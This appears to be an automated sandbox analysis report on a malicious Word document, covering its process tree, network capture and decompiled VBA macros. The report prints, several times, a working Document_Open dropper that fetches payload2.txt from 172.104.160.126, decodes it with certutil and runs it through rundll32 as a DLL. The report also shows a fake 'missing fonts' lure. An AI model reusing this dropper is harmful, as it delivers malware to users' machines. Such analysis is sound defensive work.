2024-07-22 13:52:10 UTC	439	OUT	POST /safebrowsing/clientreport/download?key=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: sb-ssl.google.com Connection: keep-alive Content-Length: 1073 Content-Type: application/octet-stream Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br
2024-07-22 13:52:10 UTC	1073	OUT	Data Raw: 0a 6e 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 6c 6f 61 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64 2f 38 2f 65 2f 31 2f 38 65 31 38 39 38 38 35 2d 31 32 66 65 2d 34 65 62 65 2d 38 39 35 64 2d 62 32 64 35 61 30 38 61 61 65 36 35 2f 4d 73 66 74 52 65 63 6f 76 65 72 79 54 6f 6f 6c 46 6f 72 43 53 76 32 2e 7a 69 70 12 22 0a 20 30 c6 5e 1e 98 79 fe 37 a4 a1 8d c8 b4 88 7c 4d fe 3b a2 9e 89 88 5d 9f e6 13 65 86 9e 93 cf fd 18 ae c7 01 22 33 0a 2f 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f 6c 69 6e 6b 69 64 3d 32 32 38 30 33 38 36 10 01 22 83 01 0a 6e 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 6c 6f 61 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64 2f 38 2f 65 2f 31 Data Ascii: nhttps://download.microsoft.com/download/8/e/1/8e189885-12fe-4ebe-895d-b2d5a08aae65/MsftRecoveryToolForCSv2.zip" 0^y7\|M;]e"3/https://go.microsoft.com/fwlink/?linkid=2280386"nhttps://download.microsoft.com/download/8/e/1
2024-07-22 13:52:11 UTC	745	IN	HTTP/1.1 200 OK P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Vary: Origin Vary: X-Origin Vary: Referer Date: Mon, 22 Jul 2024 13:52:11 GMT Content-Type: text/html Server: ESF Content-Length: 261 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Set-Cookie: NID=516=bL6Dem604lAODLtg8k5H16R2h2JIe7VVJOA5B9_ZmiSwwCL1JVa66ktBXuXsDLEQJrjn87qkgFD1Ml6H0cwgqcKRI7iuBJiJDGJ1j3roCxpJoFuvVKYQKjrpiDjRJubVtUU8_6l6jEwT1B5UzPXUX0oaAIslSvCNAUwIZx3RbKc; expires=Tue, 21-Jan-2025 13:52:11 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Expires: Mon, 22 Jul 2024 13:52:11 GMT Cache-Control: private Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-22 13:52:11 UTC	261	IN	Data Raw: 08 00 1a 80 02 35 62 36 30 65 30 30 38 63 34 33 33 66 38 34 66 61 33 62 38 63 31 38 30 33 30 32 33 36 38 61 36 35 64 65 34 31 31 63 39 39 62 31 33 64 62 61 36 65 66 35 65 65 36 32 35 66 66 62 63 37 30 37 64 35 64 37 63 34 66 38 61 37 66 33 36 34 65 34 39 38 36 31 65 32 62 65 32 61 61 33 33 35 39 38 35 30 62 64 37 33 32 34 65 34 36 30 39 33 34 61 35 61 36 36 63 62 66 65 66 35 30 39 30 63 62 38 63 66 32 65 37 30 33 39 36 63 62 38 62 34 38 66 35 30 39 61 30 39 63 62 37 38 64 33 34 66 33 33 62 31 33 34 37 65 65 61 31 37 65 39 38 31 32 63 30 61 64 66 34 65 39 39 37 35 61 38 38 62 31 64 30 64 64 61 39 66 65 31 35 64 62 66 33 65 34 35 63 38 30 65 38 33 31 62 31 37 37 65 61 62 65 31 64 36 64 64 65 66 63 31 37 30 66 62 34 63 38 30 62 38 31 33 37 32 61 38 65 34 30 Data Ascii: 5b60e008c433f84fa3b8c180302368a65de411c99b13dba6ef5ee625ffbc707d5d7c4f8a7f364e49861e2be2aa3359850bd7324e460934a5a66cbfef5090cb8cf2e70396cb8b48f509a09cb78d34f33b1347eea17e9812c0adf4e9975a88b1d0dda9fe15dbf3e45c80e831b177eabe1d6ddefc170fb4c80b81372a8e40

Target ID:	0
Start time:	09:51:17
Start date:	22/07/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f3b0000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:51:19
Start date:	22/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Imagebase:	0x4a610000
File size:	345'088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:51:19
Start date:	22/07/2024
Path:	C:\Windows\System32\xcopy.exe
Wow64 process (32bit):	false
Commandline:	xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Imagebase:	0xff890000
File size:	43'008 bytes
MD5 hash:	20CF8728C55A8743AAC86FB8D30EA898
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:51:20
Start date:	22/07/2024
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Imagebase:	0xffa90000
File size:	1'192'448 bytes
MD5 hash:	4586B77B18FA9A8518AF76CA8FD247D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:51:20
Start date:	22/07/2024
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Imagebase:	0xff300000
File size:	1'192'448 bytes
MD5 hash:	4586B77B18FA9A8518AF76CA8FD247D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:51:20
Start date:	22/07/2024
Path:	C:\Users\user\AppData\Local\Temp\curl.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Imagebase:	0x13f480000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:51:23
Start date:	22/07/2024
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Imagebase:	0xff960000
File size:	1'192'448 bytes
MD5 hash:	4586B77B18FA9A8518AF76CA8FD247D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:51:23
Start date:	22/07/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Imagebase:	0xff0a0000
File size:	45'568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:51:54
Start date:	22/07/2024
Path:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x13f6d0000
File size:	3'151'128 bytes
MD5 hash:	FFA2B8E17F645BCC20F0E0201FEF83ED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	09:51:55
Start date:	22/07/2024
Path:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x13f6d0000
File size:	3'151'128 bytes
MD5 hash:	FFA2B8E17F645BCC20F0E0201FEF83ED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	09:51:58
Start date:	22/07/2024
Path:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386"
Imagebase:	0x13f6d0000
File size:	3'151'128 bytes
MD5 hash:	FFA2B8E17F645BCC20F0E0201FEF83ED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	09:52:02
Start date:	22/07/2024
Path:	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x13f6d0000
File size:	3'151'128 bytes
MD5 hash:	FFA2B8E17F645BCC20F0E0201FEF83ED
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	09:52:16
Start date:	22/07/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f3b0000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	09:52:23
Start date:	22/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Imagebase:	0x4a610000
File size:	345'088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: xcopy.exePID: 3644, Parent PID: 3616

General

Target ID:	19
Start time:	09:52:23
Start date:	22/07/2024
Path:	C:\Windows\System32\xcopy.exe
Wow64 process (32bit):	false
Commandline:	xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Imagebase:	0xfffa0000
File size:	43'008 bytes
MD5 hash:	20CF8728C55A8743AAC86FB8D30EA898
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	09:52:24
Start date:	22/07/2024
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Imagebase:	0xff760000
File size:	1'192'448 bytes
MD5 hash:	4586B77B18FA9A8518AF76CA8FD247D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	09:52:24
Start date:	22/07/2024
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Imagebase:	0xff350000
File size:	1'192'448 bytes
MD5 hash:	4586B77B18FA9A8518AF76CA8FD247D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	09:52:24
Start date:	22/07/2024
Path:	C:\Users\user\AppData\Local\Temp\curl.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Imagebase:	0x13f300000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	09:52:26
Start date:	22/07/2024
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Imagebase:	0xffee0000
File size:	1'192'448 bytes
MD5 hash:	4586B77B18FA9A8518AF76CA8FD247D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	09:52:26
Start date:	22/07/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Imagebase:	0xff780000
File size:	45'568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: ThisDocument

Declaration

Line	Content
1	Attribute VB_Name = "ThisDocument"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Executed Functions

Subroutine
MainFuncAPIs: 6, Strings: 4, Number of lines: 57, Relevance: 34.057

APIs	Meta Information
Path
ActiveDocument
Environ	Environ("temp") -> C:\Users\Albus\AppData\Local\Temp
Chr
CreateObject	CreateObject("WScript.Shell")
Run	IWshShell3.Run("C:\Windows\System32\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\Albus\AppData\Local\Temp & certutil -f -encode C:\Users\Albus\AppData\Local\Temp\curl.exe C:\Users\Albus\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\Albus\AppData\Local\Temp\curl.txt C:\Users\Albus\AppData\Local\Temp\curl.exe & C:\Users\Albus\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\Albus\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\Albus\AppData\Local\Temp\mscorsvc.txt C:\Users\Albus\AppData\Local\Temp\mscorsvc.dll & del C:\Users\Albus\AppData\Local\Temp\curl.exe & del C:\Users\Albus\AppData\Local\Temp\curl.txt & del C:\Users\Albus\AppData\Local\Temp\curl.exe & del C:\Users\Albus\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\Albus\AppData\Local\Temp\mscorsvc.dll,DllMain & exit",0,False) -> 0

Strings	Decrypted Strings
"temp"
"http://172.104.160.126:8099"
"""
"WScript.Shell"

Line	Instruction	Meta Information
136	Sub MainFunc()
137	Dim curl_enc_txt_path as String	executed
138	Dim curl_dec_exe_path as String
139	Dim mal_enc_txt_url as String
140	Dim mal_enc_txt_path as String
141	Dim mal_dec_exe_path as String
142	Dim pp as String
143	Dim cc as String
144	Dim dir as String
145	Dim host as String
147	dir = ActiveDocument.Path	Path ActiveDocument
148	dir = Environ("temp")	Environ("temp") -> C:\Users\Albus\AppData\Local\Temp executed
149	host = "http://172.104.160.126:8099"
150	curl_enc_txt_path = dir + "\curl.txt"
151	curl_dec_exe_path = dir + "\curl.exe"
153	mal_enc_txt_url = host + "/payload2.txt"
154	mal_enc_txt_path = dir + "\mscorsvc.txt"
155	mal_dec_exe_path = dir + "\mscorsvc.dll"
157	pp = pp + "C:\Windows\Sys"
158	pp = pp + "tem32\cmd.exe /c "
159	cc = cc + curl_enc_txt_path + curl_dec_exe_path
160	pp = pp + "xcopy C:\Windows\Sys"
161	cc = cc + curl_enc_txt_path + mal_enc_txt_url
162	pp = pp + "tem32\cu" + "rl.exe " + dir + " & "
163	cc = cc + mal_enc_txt_path + mal_enc_txt_url
164	pp = pp + "certutil -f "
165	cc = cc + mal_enc_txt_path + mal_dec_exe_path
166	pp = pp + "-encode " + dir + "\cu" + "rl.exe " + curl_enc_txt_path + " & "
167	cc = cc + pp + mal_dec_exe_path
168	pp = pp + "certutil -f "
169	cc = cc + pp + dir
170	pp = pp + "-decode " + curl_enc_txt_path + " " + curl_dec_exe_path + " & "
171	cc = cc + curl_enc_txt_path + dir
173	pp = pp + curl_dec_exe_path + " " + mal_enc_txt_url + " -o " + mal_enc_txt_path + " & "
174	cc = cc + curl_enc_txt_path + dir
175	pp = pp + "certutil -f "
176	cc = cc + curl_enc_txt_path + curl_dec_exe_path
177	pp = pp + "-decode " + mal_enc_txt_path + " " + mal_dec_exe_path + " & "
178	cc = cc + mal_enc_txt_url + curl_dec_exe_path
180	pp = pp + "del " + dir + "\cu" + "rl.exe & "
181	cc = cc + host + pp + curl_enc_txt_path
182	pp = pp + "del " + curl_enc_txt_path + " & "
183	cc = cc + curl_enc_txt_path + dir
184	pp = pp + "del " + curl_dec_exe_path + " & "
185	cc = cc + curl_dec_exe_path + pp
187	pp = pp + "del " + mal_enc_txt_path + " & "
188	cc = cc + mal_enc_txt_path + pp
190	Dim vbDblQuote as String
191	vbDblQuote = Chr(34)	Chr
192	pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
193	cc = cc + mal_dec_exe_path + pp
195	pp = pp + "exit"
196	cc = cc + dir + pp
201	Dim objShell as Object
202	Set objShell = CreateObject("WScript.Shell")	CreateObject("WScript.Shell") executed
203	objShell.Run pp, 0, False	IWshShell3.Run("C:\Windows\System32\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\Albus\AppData\Local\Temp & certutil -f -encode C:\Users\Albus\AppData\Local\Temp\curl.exe C:\Users\Albus\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\Albus\AppData\Local\Temp\curl.txt C:\Users\Albus\AppData\Local\Temp\curl.exe & C:\Users\Albus\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\Albus\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\Albus\AppData\Local\Temp\mscorsvc.txt C:\Users\Albus\AppData\Local\Temp\mscorsvc.dll & del C:\Users\Albus\AppData\Local\Temp\curl.exe & del C:\Users\Albus\AppData\Local\Temp\curl.txt & del C:\Users\Albus\AppData\Local\Temp\curl.exe & del C:\Users\Albus\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\Albus\AppData\Local\Temp\mscorsvc.dll,DllMain & exit",0,False) -> 0 executed
204	End Sub

Subroutine
Document_OpenAPIs: 6, Strings: 0, Number of lines: 3, Relevance: 10.503

APIs	Meta Information
Part of subcall function MainFunc@ThisDocument: Path
Part of subcall function MainFunc@ThisDocument: ActiveDocument
Part of subcall function MainFunc@ThisDocument: Environ
Part of subcall function MainFunc@ThisDocument: Chr
Part of subcall function MainFunc@ThisDocument: CreateObject
Part of subcall function MainFunc@ThisDocument: Run

Line	Instruction	Meta Information
207	Sub Document_Open()
208	MainFunc	executed
209	End Sub

Non-Executed Functions

Subroutine
MsgFuncAPIs: 13, Strings: 6, Number of lines: 15, Relevance: 28.515

APIs	Meta Information
vbYesNo
vbCritical
vbDefaultButton2
MsgBox
vbYes
Part of subcall function DeleteText@ThisDocument: Paragraphs
Part of subcall function DeleteText@ThisDocument: Chr
Part of subcall function DeleteText@ThisDocument: Paragraphs
Part of subcall function DeleteText@ThisDocument: Paragraphs
Part of subcall function DeleteText@ThisDocument: Paragraphs
Part of subcall function DeleteText@ThisDocument: Paragraphs
Part of subcall function DeleteText@ThisDocument: ActiveDocument
Part of subcall function DeleteText@ThisDocument: Paragraphs

Strings	Decrypted Strings
"The document cannot be fully displayed due to missing fonts. Do you want to install missing fonts?"
"Missing font"
"DEMO.HLP"
"Yes"
"Yes"
"No"

Line	Instruction	Meta Information
118	Sub MsgFunc()
119	Dim Msg, Style, Title, Help, Ctxt, Response, MyString
120	Msg = "The document cannot be fully displayed due to missing fonts. Do you want to install missing fonts?"
121	Style = vbYesNo Or vbCritical Or vbDefaultButton2	vbYesNo vbCritical vbDefaultButton2
122	Title = "Missing font"
123	Help = "DEMO.HLP"
124	Ctxt = 1000
126	Response = MsgBox(Msg, Style, Title, Help, Ctxt)	MsgBox
127	If Response = vbYes Then	vbYes
128	MyString = "Yes"
129	DeleteText
130	Else
131	MyString = "No"
133	Endif
134	End Sub

Subroutine
DeleteTextAPIs: 8, Strings: 6, Number of lines: 33, Relevance: 21.033

APIs	Meta Information
Paragraphs
Chr
Paragraphs
Paragraphs
Paragraphs
Paragraphs
ActiveDocument
Paragraphs

Strings	Decrypted Strings
"Fourth paragraph displayed ""
"Fifth paragraph displayed"
"Sixth paragraph displayed"
"Seventh paragraph displayed"
"Times New Roman"
"Times New Roman"

Line	Instruction	Meta Information
16	Sub DeleteText()
26	Set rngFirstParagraph = ActiveDocument.Paragraphs(4).Range	Paragraphs
27	With rngFirstParagraph
28	. Delete
29	. InsertAfter Text := "Fourth paragraph displayed " + Chr(34)	Chr
30	. InsertParagraphAfter
31	End With
33	Set rngFirstParagraph = ActiveDocument.Paragraphs(5).Range	Paragraphs
34	With rngFirstParagraph
35	. Delete
36	. InsertAfter Text := "Fifth paragraph displayed"
37	. InsertParagraphAfter
38	End With
40	Set rngFirstParagraph = ActiveDocument.Paragraphs(6).Range	Paragraphs
41	With rngFirstParagraph
42	. Delete
43	. InsertAfter Text := "Sixth paragraph displayed"
44	. InsertParagraphAfter
45	End With
47	Set rngFirstParagraph = ActiveDocument.Paragraphs(7).Range	Paragraphs
48	With rngFirstParagraph
49	. Delete
50	. InsertAfter Text := "Seventh paragraph displayed"
51	. InsertParagraphAfter
52	End With
54	For i = 1 To ActiveDocument.Paragraphs.Count	Paragraphs ActiveDocument
56	Set myRange = ActiveDocument.Paragraphs(i).Range	Paragraphs
57	With myRange.Font
59	. Name = "Times New Roman"
60	. Size = 14
61	End With
62	Next i	Paragraphs ActiveDocument
63	End Sub

Subroutine
ShowErrorTextAPIs: 6, Strings: 0, Number of lines: 16, Relevance: 7.516

APIs	Meta Information
Paragraphs
ChrW
ChrW
ChrW
ChrW
ChrW

Line	Instruction	Meta Information
65	Sub ShowErrorText()
66	Dim rngFirstParagraph as Range
68	Set rngFirstParagraph = ActiveDocument.Paragraphs(4).Range	Paragraphs
69	With rngFirstParagraph
70	. Delete
71	. InsertAfter Text := ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3)	ChrW
76	. InsertParagraphAfter
